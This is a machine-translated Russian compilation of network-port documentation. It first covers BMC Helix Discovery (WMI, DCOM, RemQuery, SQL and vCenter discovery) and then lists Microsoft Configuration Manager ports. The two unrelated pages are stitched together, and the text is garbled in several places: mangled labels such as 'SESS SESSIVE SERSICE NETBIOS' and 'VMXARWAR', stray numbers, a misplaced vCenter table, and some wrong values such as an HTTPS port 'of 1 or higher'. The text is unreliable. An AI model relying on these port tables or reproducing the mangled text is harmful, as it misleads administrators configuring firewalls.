Все сообщения WMI от BMC Helix Discovery отправляются с включенной защитой пакетов. Если обнаруживаемый узел не поддерживает защиту пакетов, флаг игнорируется, и WMI возвращает запрошенную информацию (например, если вы используете более раннюю версию, чем Windows Server 2003 с пакетом обновления 1 (SP1)). В случаях, когда указан диапазон, один из портов используется после первоначального согласования.

Порты, используемые методами обнаружения WMI, и соответствующие назначенные порты описаны в следующей таблице.

Port Number	Port assignment
135	DCE RPC Endpoint Manager DCOM Service Control
49152-65535	DCOM
139	SESS SESSIVE SERSICE NETBIOS
445	Microsoft Directory Services SMB

3

9

вы обнаруживаете NT4 или выполняете аутентификацию в домене, отличном от AD, в стиле NT4 (например, в домене, работающем с использованием Samba 3.

x или более ранней версии).

TCP 139 — это служба сеансов NetBIOS. Некоторые версии Windows (особенно 9x/NT4) запускайте SMB в NetBIOS через TCP, используя порт 139. В более новых версиях по умолчанию SMB запускается непосредственно через TCP через порт 445. Windows XP/2003/Vista/2008 и более поздние версии, а также сети Active Directory используют SMB напрямую через TCP 445.

Запросы WMI от Windows Server 2008 к узлу Windows NT4 завершаются ошибкой при использовании параметров безопасности по умолчанию. На прокси-узле Windows отключите требование 128-битной безопасности в Сетевая безопасность: минимальная безопасность сеанса для клиентов на основе NTLM SSP (включая RPC) политика, разрешающая это.

Диапазон портов DCOM

WMI основан на объектной модели распределенных компонентов (DCOM), которая по умолчанию использует для связи случайно выбранный TCP-порт между 49152 и 65535. Чтобы сделать это более эффективным для брандмауэров, диапазон можно ограничить с помощью следующей процедуры на каждом целевом хосте. Дополнительные сведения об этой проблеме см. в разделе Как настроить динамическое выделение портов RPC для работы с брандмауэрами.

Чтобы установить диапазон портов DCOM:.

С помощью редактора реестра создайте ключ HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet
В этом ключе создайте REG_MULTI_SZ (многострочное значение) с именем Ports.
Укажите порт или диапазон портов для использования.
Прокси-сервер Windows использует только один порт. Однако, если у пользователя есть другие приложения DCOM, используемые на этом компьютере, вам может потребоваться включить больший диапазон.
Создайте REG_SZ (строковое значение) с именем PortsInternetAvailable и присвойте ему значение Y .
Создайте REG_SZ (строковое значение) с именем UseInternetPorts и присвойте ему значение Y .
Перезагрузите компьютер.

RemQuery

Хотя WMI является стандартным механизмом удаленного опроса и управления системой от Microsoft. Однако некоторые операции с помощью WMI невозможны. В первую очередь данные netstat при обнаружении ядра, а также любые дополнительные выполняемые команды или извлечение содержимого файла с помощью шаблонов. Без RemQuery невозможно определить информацию о сетевом соединении для цели обнаружения, обмен данными между этим хостом и другими, а также моделирование приложений на основе сетевых подключений. Дополнительные операции обнаружения с использованием RemQuery обычно предназначены для более глубокого обнаружения программного обеспечения, моделирования и управления версиями.

RemQuery — это утилита обнаружения BMC Helix, использующая тот же базовый подход, что и инструмент Microsoft PSExec. Прокси-сервер копирует исполняемый файл RemQuery в общую папку ADMIN$ на целевом устройстве. Для записи в общую папку ADMIN$ и запуска службы RemQuery требуется доступ администратора Windows. Как только служба запущена на цели, прокси-сервер отправляет свой открытый ключ службе RemQuery, которая генерирует ключ шифрования, шифрует его с помощью полученного открытого ключа, а затем отправляет его обратно. Затем прокси-сервер восстанавливает ключ шифрования, используя свой закрытый ключ. С этого момента вся связь прокси-сервера с RemQuery защищена с помощью ключа шифрования и соответствующего алгоритма, в зависимости от целевой системы. Обнаружение RemQuery использует шифрование AES с 256-битным ключом. AES не поддерживается в Windows 2000, поэтому для обнаружения RemQuery используется шифрование DES. Windows NT не поддерживает AES или DES, поэтому обнаружение RemQuery не зашифровано. Прокси взаимодействует со службой RemQuery, используя именованный канал. Этот канал защищен, поэтому доступ к нему может получить только пользователь с правами администратора.

Порты, используемые обнаружением RemQuery, и соответствующие назначения портов описаны в следующей таблице.

Port Number	Port assignment
139	Netbios Session Service
445	Microsoft Directory Services SMB

Домены в стиле Windows NT4 и NT4 (RemQuery)

TCP 139 требуется вместо TCP 445, если вы обнаружите NT4 или если вы выполняете аутентификацию в домене в стиле NT4, отличном от AD, таком как домен, работающий с использованием Samba 3. x или более ранней версии.

TCP 139 — это служба сеансов NetBIOS. Некоторые версии Windows (в частности, 9x/NT4) запускают SMB в NetBIOS через TCP, используя порт 139. Более новые версии по умолчанию запускают SMB напрямую через TCP через порт 445. Windows XP/2003/Vista/2008 и более поздние версии, а также сети Active Directory используют SMB напрямую. через TCP 445.

Порты мейнфрейма, используемые для обнаружения

Для обнаружения мейнфрейма требуется только порт 3940 TCP. Дополнительные сведения о настройке этого порта см. в разделе Конфигурация обнаружения.

Порты WBEM, используемые для обнаружения

Порты по умолчанию, используемые для обнаружения WBEM, описаны в следующей таблице. Дополнительные сведения о настройке этого порта см. в разделе Конфигурация обнаружения.

Номер порта	Назначение порта
5988	HTTP
5989	HTTPS

Ports required for extended discovery

The following sections detail port information for extended discovery types.

Обнаружение SQL

Информация о порте, используемая для обнаружения SQL, получена из шаблонов, используемых для обнаружения конкретной базы данных. Это зависит от того, как базы данных настроены в вашей организации. В следующей таблице указаны порты по умолчанию.

S00ASE 3

Port Number	Port Assignment	Use
1521	SQL	Oracle
1433	SQL	MS SQL
4100	SQL	0449
3306	SQL	MySQL

VMware ESX/ESXi discovery using vCenter

The ports required for the discovery of VMware ESX/ESXi hosts using vCenter are listed in the following стол.

Номер порта

.0002 443

HTTPS

VMware ESX/ESXI (vCenter https порт по умолчания в следующей таблице.

944444499000

VMXARWAR

Была ли эта страница полезной? да нет Отправка… Что не так с этой страницей?
Запутанно
Отсутствуют скриншоты, графика
Отсутствуют технические детали
Требуется видео
Неверно
Не та информация, которую я ожидал Ваш отзыв:

Отправить Пропустить Спасибо

Порты, используемые для подключений — Configuration Manager

Статья
04. 10.2022
20 минут на чтение

Применяется к: Configuration Manager (текущая ветвь)

В этой статье перечислены сетевые порты, используемые Configuration Manager. Некоторые соединения используют порты, которые нельзя настроить, а некоторые поддерживают настраиваемые порты, указанные вами. Если вы используете какую-либо технологию фильтрации портов, убедитесь, что необходимые порты доступны. Эти технологии фильтрации портов включают брандмауэры, маршрутизаторы, прокси-серверы или IPsec.

Примечание

Если вы поддерживаете интернет-клиентов с помощью SSL-моста, в дополнение к требованиям к портам вам также может потребоваться разрешить некоторым командам HTTP и заголовкам проходить через брандмауэр.

Порты, которые можно настроить

Configuration Manager позволяет настроить порты для следующих типов связи:

Точка прокси-сервера регистрации к точке регистрации
Системы клиент-сайт, на которых работает IIS
Клиент в Интернет (как настройки прокси-сервера)
Обновление программного обеспечения указывает на Интернет (как настройки прокси-сервера)
Точка обновления программного обеспечения для сервера WSUS
Сервер сайта на сервер базы данных сайта
Сервер сайта на сервер базы данных WSUS
Пункты службы отчетности
Примечание
Вы настраиваете порты для точки служб отчетов в службах отчетов SQL Server. Затем Configuration Manager использует эти порты во время обмена данными с точкой служб отчетов. Обязательно просмотрите эти порты, которые определяют информацию IP-фильтра для политик IPsec или для настройки брандмауэров.

По умолчанию порт HTTP, который используется для системной связи между клиентом и сайтом, — это порт 80, а порт 443 — для HTTPS. Вы можете изменить эти порты во время установки или в свойствах сайта.

Ненастраиваемые порты

Configuration Manager не позволяет настраивать порты для следующих типов связи:

Site-to-site
Сервер сайта к системе сайта
Консоль Configuration Manager для поставщика SMS
Консоль Configuration Manager к Интернету
Подключения к облачным службам, таким как Microsoft Azure

Порты, используемые клиентами и системами сайта

В следующих разделах описаны порты, используемые для связи в Configuration Manager. Стрелки в заголовке раздела показывают направление связи:

Точка синхронизации Asset Intelligence

--> Microsoft

Номер порта	.0003	VMware ESX/ESXI
902	VSPHERE API	VMWARE ESX/ESXI

Описание	УДП	TCP
HTTPS	—	443

Точка синхронизации Asset Intelligence

--> SQL Server

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Клиент

--> Клиент

Прокси-сервер пробуждения также использует сообщения эхо-запроса ICMP от одного клиента к другому клиенту. Клиенты используют эту связь, чтобы подтвердить, активен ли другой клиент в сети. ICMP иногда называют командами ping. ICMP не имеет номера протокола UDP или TCP, поэтому он не указан в таблице ниже. Однако любые брандмауэры на основе хоста на этих клиентских компьютерах или промежуточные сетевые устройства в подсети должны разрешать трафик ICMP для успешной связи с прокси-сервером пробуждения.

Описание	УДП	TCP
Пробуждение по локальной сети	9 ^{Примечание 2 Доступен альтернативный порт}	—
Прокси-сервер пробуждения	25536 ^{Примечание 2 Доступен альтернативный порт}	—
Широковещательная передача однорангового кэша Windows PE	8004	—
Загрузка однорангового кэша Windows PE	—	8003

Дополнительные сведения см. в разделе Одноранговый кэш Windows PE.

Клиент

--> Модуль политики службы регистрации сетевых устройств (NDES) Configuration Manager

Описание	УДП	TCP
HTTP		80
HTTPS	—	443

Клиент

--> Облачная точка распространения

Описание	УДП	TCP
HTTPS	—	443

Дополнительные сведения см. в разделе Порты и поток данных.

Клиент

--> Шлюз облачного управления (CMG)

Описание	УДП	TCP
HTTPS	—	443

Дополнительные сведения см. в разделе Поток данных CMG.

Клиент

--> Точка распространения, как стандартная, так и по запросу

Описание	УДП	TCP
HTTP	—	80 ^{Примечание 2 Доступен альтернативный порт}
HTTPS	—	443 ^{Примечание 2 Доступен альтернативный порт}
Экспресс-обновления	—	8005 ^{Примечание 2 Доступен альтернативный порт}

Примечание

Используйте параметры клиента для настройки альтернативного порта для экспресс-обновлений. Дополнительные сведения см. в разделе Порт, который клиенты используют для получения запросов на дельта-контент.

Клиент

--> Точка распространения настроена для многоадресной рассылки, как стандартной, так и по запросу

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Многоадресный протокол	63000-64000	—

Клиент

--> Точка распространения, настроенная для PXE, стандартная и по запросу

Описание	УДП	TCP
DHCP-сервер	67 и 68	—
TFTP	69 ^{Примечание 4}	—
Уровень согласования информации о загрузке (BINL)	4011	—
DHCPv6 для ответчика PXE без WDS	547	—

Важно

Если вы включаете межсетевой экран на основе хоста, убедитесь, что правила разрешают серверу отправлять и получать данные через эти порты. Когда вы включаете точку распространения для PXE, Configuration Manager может включить правила входящего (получения) в брандмауэре Windows. Он не настраивает исходящие (отправляемые) правила.

Клиент

--> Резервная точка состояния

Описание	УДП	TCP
HTTP	—	80 ^{Примечание 2 Доступен альтернативный порт}

Клиент

--> Контроллер домена глобального каталога

Клиент Configuration Manager не связывается с сервером глобального каталога, если он является компьютером рабочей группы или настроен для связи только через Интернет.

Описание	УДП	TCP
Глобальный каталог LDAP	—	3268

Клиент

--> Точка управления

Описание	УДП	TCP
Уведомление клиента (связь по умолчанию перед переходом на HTTP или HTTPS)	—	10123 ^{Примечание 2 Доступен альтернативный порт}
HTTP	—	80 ^{Примечание 2 Доступен альтернативный порт}
HTTPS	—	443 ^{Примечание 2 Доступен альтернативный порт}

Клиент

--> Точка обновления ПО

Описание	УДП	TCP
HTTP	—	80 или 8530 ^{Примечание 3}
HTTPS	—	443 или 8531 ^{Примечание 3}

Клиент

--> Точка миграции состояния

Описание	УДП	TCP
HTTP	—	80 ^{Примечание 2 Доступен альтернативный порт}
HTTPS	—	443 ^{Примечание 2 Доступен альтернативный порт}
Блок сообщений сервера (SMB)	—	445

Точка подключения CMG

--> Масштабируемый набор виртуальных машин CMG

Configuration Manager использует эти подключения для создания канала CMG. Дополнительные сведения см. в разделе поток данных CMG.

Описание	УДП	TCP
HTTPS (одна ВМ)	—	443
HTTPS (две или более ВМ)	—	10124-10139

Точка подключения CMG

--> Классическая облачная служба CMG

Описание	УДП	TCP
TCP-TLS (предпочтительно)	—	10140-10155
HTTPS (резервный вариант с одной виртуальной машиной)	—	443
HTTPS (резервный вариант с двумя или более виртуальными машинами)	—	10124-10139

Точка подключения CMG

--> Точка управления

Описание	УДП	TCP
HTTPS	—	443
HTTP	—	80

Конкретный требуемый порт зависит от конфигурации точки управления. Дополнительные сведения см. в разделе поток данных CMG.

Точка подключения CMG

--> Точка обновления программного обеспечения

Конкретный порт зависит от конфигурации точки обновления программного обеспечения.

Описание	УДП	TCP
HTTPS	—	443/8531
HTTP	—	80/8530

Дополнительные сведения см. в разделе Поток данных CMG.

Консоль Configuration Manager

--> Клиент

Описание	УДП	TCP
Пульт дистанционного управления (управление)	—	2701
Удаленный помощник (RDP и RTC)	—	3389

Консоль Configuration Manager

--> Интернет

Описание	УДП	TCP
HTTP	—	80
HTTPS	—	443

Консоль Configuration Manager использует доступ к Интернету для следующих действий:

Загрузка обновлений программного обеспечения из Центра обновления Майкрософт для пакетов развертывания.
Элемент Feedback на ленте.
Ссылки на документацию в консоли.
Загрузка элементов из Центра сообщества

Консоль Configuration Manager

--> Точка служб отчетов

Описание	УДП	TCP
HTTP	—	80 ^{Примечание 2 Доступен альтернативный порт}
HTTPS	—	443 ^{Примечание 2 Доступен альтернативный порт}

Консоль Configuration Manager

--> Сервер сайта

Описание	УДП	TCP
RPC (начальное подключение к WMI для поиска системы поставщика)	—	135

Консоль Configuration Manager

--> Поставщик SMS

Описание	УДП	TCP
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}
HTTPS	—	443 ^{*Примечание}

Примечание для службы администрирования

Любое устройство, выполняющее вызов службы администрирования поставщика SMS, использует порт HTTPS 443. Дополнительные сведения см. в разделе Что такое служба администрирования?

Модуль политики службы регистрации сетевых устройств (NDES) Configuration Manager

--> Точка регистрации сертификата

Описание	УДП	TCP
HTTPS	—	443 ^{Примечание 2 Доступен альтернативный порт}

Точка обслуживания хранилища данных

--> SQL Server

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Точка распространения, как стандартная, так и по запросу

--> Точка управления

Точка распространения взаимодействует с точкой управления в следующих сценариях:

Чтобы сообщить о состоянии предварительно подготовленного содержимого
Для отчета сводных данных об использовании
Чтобы сообщить о проверке содержимого
Чтобы сообщить о статусе загрузки пакетов, только для точек распространения по запросу

Описание	УДП	TCP
HTTP	—	80 ^{Примечание 2 Доступен альтернативный порт}
HTTPS	—	443 ^{Примечание 2 Доступен альтернативный порт}

Endpoint Protection Point

--> Интернет

Описание	УДП	TCP
HTTP	—	80

Точка Endpoint Protection

--> SQL Server

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Прокси-точка регистрации

--> Точка регистрации

Описание	УДП	TCP
HTTPS	—	443 ^{Примечание 2 Доступен альтернативный порт}

Точка регистрации

--> SQL Server

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Соединитель Exchange Server

--> Exchange Online

Описание	УДП	TCP
Удаленное управление Windows через HTTPS	—	5986

Соединитель Exchange Server

--> Локальный сервер Exchange

Описание	УДП	TCP
Удаленное управление Windows через HTTP	—	5985

Компьютер Mac

--> Прокси-точка регистрации

Описание	УДП	TCP
HTTPS	—	443

Точка управления

--> Контроллер домена

Описание	УДП	TCP
Упрощенный протокол доступа к каталогам (LDAP)	389	389
Безопасный LDAP (LDAPS, для подписи и привязки)	636	636
Глобальный каталог LDAP	—	3268
Сопоставитель конечных точек RPC	—	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Точка управления

<--> Сервер сайта

^{Примечание 5}

Описание	УДП	TCP
Сопоставитель конечных точек RPC	—	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}
Блок сообщений сервера (SMB)	—	445

Точка управления

--> SQL Server

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Мобильное устройство

--> Прокси-точка регистрации

Описание	УДП	TCP
HTTPS	—	443

Точка распределения по запросу

--> Точка распространения, настроенная как источник

Описание	УДП	TCP
HTTP	—	80 ^{Примечание 2 Доступен альтернативный порт}
HTTPS	—	443 ^{Примечание 2 Доступен альтернативный порт}
Экспресс-обновления	—	8005 ^{Примечание 2 Доступен альтернативный порт}

Точка служб Reporting Services

--> SQL Server

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Точка подключения службы

--> Azure (CMG)

Описание	УДП	TCP
HTTPS для развертывания службы CMG	—	443

Дополнительные сведения см. в разделе Поток данных CMG.

Точка подключения службы

--> Azure Logic App

Описание	УДП	TCP
HTTPS для внешнего уведомления	—	443

Дополнительные сведения см. в разделе Внешние уведомления.

Сервер сайта

<--> Точка синхронизации Asset Intelligence

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

--> Клиент

Описание	УДП	TCP
Пробуждение по локальной сети	9 ^{Примечание 2 Доступен альтернативный порт}	—

Сервер сайта

--> Облачная точка распространения

Описание	УДП	TCP
HTTPS	—	443

Дополнительные сведения см. в разделе Порты и поток данных.

Сервер сайта

--> Точка распространения, как стандартная, так и по запросу

^{Примечание 5}

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

--> Контроллер домена

Описание	УДП	TCP
Упрощенный протокол доступа к каталогам (LDAP)	389	389
Безопасный LDAP (LDAPS, для подписи и привязки)	636	636
Глобальный каталог LDAP	—	3268
Сопоставитель конечных точек RPC	—	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Пункт регистрации сертификатов

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Точка подключения CMG

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Точка Endpoint Protection

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Точка регистрации

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Прокси-точка регистрации

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Резервная точка состояния

^{Примечание 5}

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

--> Интернет

Описание	УДП	TCP
HTTP	—	80 ^{Примечание 1}
HTTPS	—	443

Сервер сайта

<--> Выдающий центр сертификации (ЦС)

Это соединение используется при развертывании профилей сертификатов с помощью точки регистрации сертификатов. Связь не используется для каждого сервера сайта в иерархии. Вместо этого он используется только для сервера сайта на вершине иерархии.

Описание	УДП	TCP
Сопоставитель конечных точек RPC	135	135
RPC (DCOM)	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

--> Сервер, на котором размещается общий ресурс удаленной библиотеки содержимого

Вы можете переместить библиотеку содержимого в другое место хранения, чтобы освободить место на жестком диске на серверах центра администрирования или основного сайта. Дополнительные сведения см. в разделе Настройка удаленной библиотеки содержимого для сервера сайта.

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445

Сервер сайта

<--> Точка подключения службы

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Точка служб отчетов

^{Примечание 5}

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Сервер сайта

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445

Сервер сайта

--> SQL Server

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Во время установки сайта, использующего удаленный SQL Server для размещения базы данных сайта, откройте следующие порты между сервером сайта и SQL Server:

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

--> SQL Server для WSUS

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 3 Доступен альтернативный порт}

Сервер сайта

--> Поставщик SMS

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}

Сервер сайта

<--> Точка обновления ПО

^{Примечание 5}

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
ПКР	—	ДИНАМИЧЕСКИЙ ^{Примечание 6}
HTTP	—	80 или 8530 ^{Примечание 3}
HTTPS	—	443 или 8531 ^{Примечание 3}

Сервер сайта

<--> Точка миграции состояния

^{Примечание 5}

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445
Сопоставитель конечных точек RPC	135	135

Поставщик SMS

--> SQL Server

Описание	УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Точка обновления ПО

--> Интернет

Описание	УДП	TCP
HTTP	—	80 ^{Примечание 1}

Точка обновления программного обеспечения

--> Вышестоящий сервер WSUS

Описание	УДП	TCP
HTTP	—	80 или 8530 ^{Примечание 3}
HTTPS	—	443 или 8531 ^{Примечание 3}

SQL Server

--> SQL Server

Межсайтовая репликация базы данных требует, чтобы SQL Server на одном сайте напрямую взаимодействовал с SQL Server на его родительском или дочернем сайте.

Описание	УДП	TCP
Служба SQL Server	—	1433 ^{Примечание 2 Доступен альтернативный порт}
Посредник службы SQL Server	—	4022 ^{Примечание 2 Доступен альтернативный порт}

Совет

Configuration Manager не требует браузера SQL Server, который использует порт UDP 1434.

Точка миграции состояния

--> SQL Server

Описание		УДП	TCP
SQL через TCP	—	1433 ^{Примечание 2 Доступен альтернативный порт}

Примечания относительно портов, используемых клиентами и системами сайта

Примечание 1: Порт прокси-сервера

Этот порт нельзя настроить, но его можно маршрутизировать через настроенный прокси-сервер.

Примечание 2. Доступен альтернативный порт

Для этого значения можно определить альтернативный порт в Configuration Manager. Если вы определяете настраиваемый порт, используйте этот настраиваемый порт в информации IP-фильтра для политик IPsec или для настройки брандмауэров.

Примечание 3. Службы обновления Windows Server (WSUS)

Начиная с Windows Server 2012, WSUS по умолчанию использует порт 8530 для HTTP и порт 8531 для HTTPS.

После установки можно изменить порт. Вам не обязательно использовать один и тот же номер порта во всей иерархии сайта.

Если порт HTTP — 80, порт HTTPS должен быть 443.
Если порт HTTP другой, порт HTTPS должен быть 1 или выше, например, 8530 и 8531.
Примечание
При настройке точки обновления программного обеспечения для использования HTTPS порт HTTP также должен быть открыт. Незашифрованные данные, такие как лицензионное соглашение для определенных обновлений, используют порт HTTP.
Сервер сайта устанавливает соединение с SQL Server, на котором размещается SUSDB, при включении следующих параметров очистки WSUS:
- Добавьте некластеризованные индексы в базу данных WSUS для повышения производительности очистки WSUS
- Удалить устаревшие обновления из базы данных WSUS

Если вы измените порт SQL Server по умолчанию на альтернативный порт с помощью диспетчера конфигурации SQL Server, убедитесь, что сервер сайта может подключиться, используя определенный порт. Configuration Manager не поддерживает динамические порты. По умолчанию именованные экземпляры SQL Server используют динамические порты для подключения к ядру базы данных. При использовании именованного экземпляра вручную настройте статический порт.

Примечание 4: демон Trivial FTP (TFTP)

Системная служба демона Trivial FTP (TFTP) не требует имени пользователя или пароля и является неотъемлемой частью служб развертывания Windows (WDS). Служба Trivial FTP Daemon реализует поддержку протокола TFTP, который определяется следующими документами RFC:

RFC 1350: TFTP
.
RFC 2347: расширение опции
RFC 2348: параметр размера блока
RFC 2349: Параметры интервала ожидания и размера передачи

TFTP предназначен для поддержки бездисковых загрузочных сред. Демоны TFTP прослушивают UDP-порт 69, но отвечают с динамически выделяемого старшего порта. Если вы включите этот порт, служба TFTP сможет получать входящие запросы TFTP, но выбранный сервер не сможет отвечать на эти запросы. Вы не можете разрешить выбранному серверу отвечать на входящие запросы TFTP, пока не настроите сервер TFTP для ответа с порта 69.

Точка распространения с поддержкой PXE и клиент в Windows PE выбирают динамически выделяемые старшие порты для передачи TFTP. Эти порты определены Microsoft между 49152 и 65535. Дополнительные сведения см. в разделе Обзор служб и требования к сетевым портам для Windows.

Однако во время фактической загрузки PXE сетевая карта на устройстве выбирает динамически выделяемый старший порт, который она использует во время передачи TFTP. Сетевая карта на устройстве не привязана к динамически выделяемым старшим портам, определенным Microsoft. Он привязан только к портам, определенным в RFC 1350. Этот порт может быть любым от 0 до 65535. Для получения дополнительных сведений о том, какие динамически выделяемые старшие порты использует сетевая карта, обратитесь к производителю оборудования устройства.

Примечание 5. Связь между сервером сайта и системами сайта

По умолчанию связь между сервером сайта и системами сайта является двунаправленной. Сервер сайта начинает обмен данными для настройки системы сайта, а затем большинство систем сайта снова подключаются к серверу сайта для отправки сведений о состоянии. Точки обслуживания отчетов и точки распространения не отправляют информацию о состоянии. Если вы выберете Требовать от сервера сайта инициировать подключения к этой системе сайта в свойствах системы сайта после установки системы сайта, система сайта не начнет связь с сервером сайта. Вместо этого сервер сайта начинает связь. Он использует учетную запись установки системы сайта для проверки подлинности на сервере системы сайта.

Примечание 6. Динамические порты

Динамические порты используют диапазон номеров портов, определяемый версией ОС. Эти порты также известны как эфемерные порты. Дополнительные сведения о диапазонах портов по умолчанию см. в разделе Обзор служб и требования к сетевым портам для Windows.

Другие порты

В следующих разделах содержится дополнительная информация о портах, используемых Configuration Manager.

Общие ресурсы клиент-сервер

Клиенты используют блок сообщений сервера (SMB) всякий раз, когда они подключаются к общим ресурсам UNC. Например:

Описание	УДП	TCP
Блок сообщений сервера (SMB)	—	445

Подключения к SQL Server

Для связи с ядром базы данных SQL Server и для межсайтовой репликации можно использовать порт SQL Server по умолчанию или указать настраиваемые порты:

Использование межсайтовых соединений:
- SQL Server Service Broker, который по умолчанию использует порт TCP 4022.
- Служба SQL Server, которая по умолчанию использует порт TCP 1433.
Внутрисайтовая связь между ядром базы данных SQL Server и различными ролями системы сайта Configuration Manager по умолчанию использует порт TCP 1433.
Configuration Manager использует одни и те же порты и протоколы для связи с каждой репликой группы доступности Always On SQL Server, на которой размещается база данных сайта, как если бы эта реплика была автономным экземпляром SQL Server.

Если вы используете Azure и база данных сайта находится за внутренним или внешним балансировщиком нагрузки, настройте следующие компоненты:

Исключения брандмауэра на каждой реплике
Правила балансировки нагрузки

Настройте следующие порты:

SQL через TCP: TCP 1433
Посредник службы SQL Server: TCP 4022
Блок сообщений сервера (SMB): TCP 445
Сопоставитель конечных точек RPC: TCP 135

Предупреждение

Configuration Manager не поддерживает динамические порты. По умолчанию именованные экземпляры SQL Server используют динамические порты для подключения к ядру базы данных. При использовании именованного экземпляра вручную настройте статический порт для внутрисайтовой связи.

Следующие роли системы сайта напрямую взаимодействуют с базой данных SQL Server:

Роль точки регистрации сертификатов
Роль точки регистрации
Точка управления
Сервер сайта
Пункт служб Reporting Services
Поставщик SMS
SQL Server --> SQL Server

Когда SQL Server размещает базу данных с нескольких сайтов, каждая база данных должна использовать отдельный экземпляр SQL Server. Настройте каждый экземпляр с уникальным набором портов.

Если вы включаете брандмауэр на базе хоста на сервере SQL Server, настройте его так, чтобы он разрешал правильные порты. Также настройте сетевые брандмауэры между компьютерами, взаимодействующими с SQL Server.

Пример настройки SQL Server для использования определенного порта см. в разделе Настройка сервера для прослушивания определенного порта TCP.

Обнаружение и публикация

Configuration Manager использует следующие порты для обнаружения и публикации информации сайта:

Упрощенный протокол доступа к каталогам (LDAP): 389
Secure LDAP (LDAPS, для подписи и привязки): 636
Глобальный каталог LDAP: 3268
Сопоставитель конечных точек RPC: 135
RPC: динамически выделенные высокие порты TCP
TCP: 1024: 5000
TCP: 49152: 65535

Внешние подключения, созданные Configuration Manager

Локальные клиенты Configuration Manager или системы сайта могут устанавливать следующие внешние подключения:

Точка синхронизации Asset Intelligence --> Microsoft
Точка Endpoint Protection --> Интернет
Клиент --> Контроллер домена глобального каталога
Консоль Configuration Manager --> Интернет
Точка управления --> Контроллер домена
Сервер сайта --> Контроллер домена
Сервер сайта <--> Выдающий центр сертификации (ЦС)
Точка обновления программного обеспечения --> Интернет
Точка обновления программного обеспечения --> Вышестоящий сервер WSUS
Точка подключения службы --> Azure
Точка подключения службы --> Azure Logic App
Точка подключения CMG --> Облачная служба CMG

Требования к установке систем сайта, поддерживающих интернет-клиенты

Примечание

Этот раздел относится только к управлению интернет-клиентами (IBCM). Это не относится к шлюзу управления облаком. Дополнительные сведения см. в разделе Управление клиентами в Интернете.

Точки управления в Интернете, точки распространения, поддерживающие клиентов в Интернете, точка обновления программного обеспечения и резервная точка состояния используют следующие порты для установки и восстановления:

Сервер сайта --> Система сайта: Сопоставитель конечных точек RPC с использованием UDP и TCP-порта 135
Сервер сайта --> Система сайта: динамические TCP-порты RPC
Сервер сайта <--> Система сайта: блоки сообщений сервера (SMB) с использованием TCP-порта 445

Для установки приложений и пакетов в точках распространения требуются следующие порты RPC:

Используйте IPsec для защиты трафика между сервером сайта и системами сайта. Если вам необходимо ограничить динамические порты, используемые с RPC, вы можете использовать средство настройки Microsoft RPC (rpccfg. exe). Используйте инструмент для настройки ограниченного диапазона портов для этих пакетов RPC. Дополнительные сведения см. в разделе Как настроить RPC для использования определенных портов и как защитить эти порты с помощью IPsec.

Важно

